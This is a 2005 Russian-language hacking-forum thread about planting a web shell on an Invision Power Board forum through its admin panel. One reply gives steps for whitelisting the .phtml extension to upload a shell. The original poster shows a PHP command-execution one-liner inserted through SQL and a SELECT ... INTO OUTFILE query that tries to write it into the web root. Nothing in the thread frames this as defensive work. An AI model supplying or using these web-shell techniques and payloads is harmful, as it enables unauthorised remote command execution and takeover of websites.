09.12.2005, 02:04
|
|
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами:
10753243
Репутация:
1
|
|
Взлом ipb через админку
Честно и старательно провел 20 минут в поисках похожих тем, но ничего полезного не нашел.
Есть нормальный доступ к админской панели, нужно всего лишь залить шелл на сайт. Uploads доступен на запись, закачать в папку со смайлами удается, но прочитать - нет(АшиПка 500).
Я читал эту статью, но тамошний вариант с подменой запроса не работает - файл не передается. Прошу помочь. Устроит любой вариант, главное - шелл залить. |
|
|
09.12.2005, 19:09
|
|
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами:
11217926
Репутация:
726
|
|
Какой версии форум?
|
|
|
|
09.12.2005, 22:11
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
|
|
|
|
10.12.2005, 01:55
|
|
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами:
10753243
Репутация:
1
|
|
to Barsik
ipb 1.3 final
to Green_Bear
Попробовал как ты написал. Результат:
запрещено загружать файлы такого типа, в качестве аватаров или фотографий
Последний раз редактировалось fixer2; 10.12.2005 в 02:07..
|
|
|
|
10.12.2005, 04:49
|
|
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами:
10753243
Репутация:
1
|
|
Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.
Последний раз редактировалось fixer2; 10.12.2005 в 05:49..
|
|
|
|
10.12.2005, 22:09
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами:
11212166
Репутация:
182
|
|
Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.
Юзай поиск тема обсуждалась( into outfile)
Если вопрос не закрыт то иди сюда(лучшие доки) - http://dev.mysql.com/doc/
|
|
|
|
10.12.2005, 23:11
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами:
10840706
Репутация:
547
|
|
Делай так: Если форум IPB 2 0 4.
Зайди в Админку,
Системные настройки---->Главная конфигурация---->Профили пользователей---->Разрешенные расширения файлов для аватар.
Ставиш разширение phtml.
Это тоже самое что и php, потом идёш в Аттачи и делаеш тама ешё один тип-.phtml, тип пишем от пхп файлов, то есть application/octet-stream после всего это идёш и грузиш свой шелл , только с изменёным разширением в phtml, потом смотриш его свойства вот и всё, можна сказать я тебе на пальчиках всё обяснил,вчера темже способом Грин для меня шелл закинул.
Если я помог тебе не забудь про репутацию Грину и мне.
Респект Грину за выложеную инфу.
Последний раз редактировалось Tem; 10.12.2005 в 23:18..
|
|
|
|
11.12.2005, 03:06
|
|
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами:
10753243
Репутация:
1
|
|
to Tem
Читай топ внимательнее.
to qBiN
Спасибо за инфу, но все равно пока не получается...
Последний раз редактировалось fixer2; 11.12.2005 в 08:18..
|
|
|
|
11.12.2005, 08:22
|
|
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами:
10753243
Репутация:
1
|
|
Значит прочел-таки я это небольшое пособие. Как выяснилось - в мускуле сложных команд нету. Тем не менее залить шелл не удается.
Сначала я собственно создал значение в таблице юзеров:
INSERT INTO table (par1, par2) VALUES ('7777','<? system($_GET["cmd"]); ?> ')
Теперь инто файл хочу его залить:
SELECТ name FROM table INTO OUTFILE '/home/user/www/shell.php'
Но, увы, не получается. В ответ вижу следующее сообщение:
Access denied for user: 'forum@localhost' (Using password: YES)
Это означает что инто аутфайл запрещен? Какие тогда варианты есть?
Последний раз редактировалось fixer2; 11.12.2005 в 08:35..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
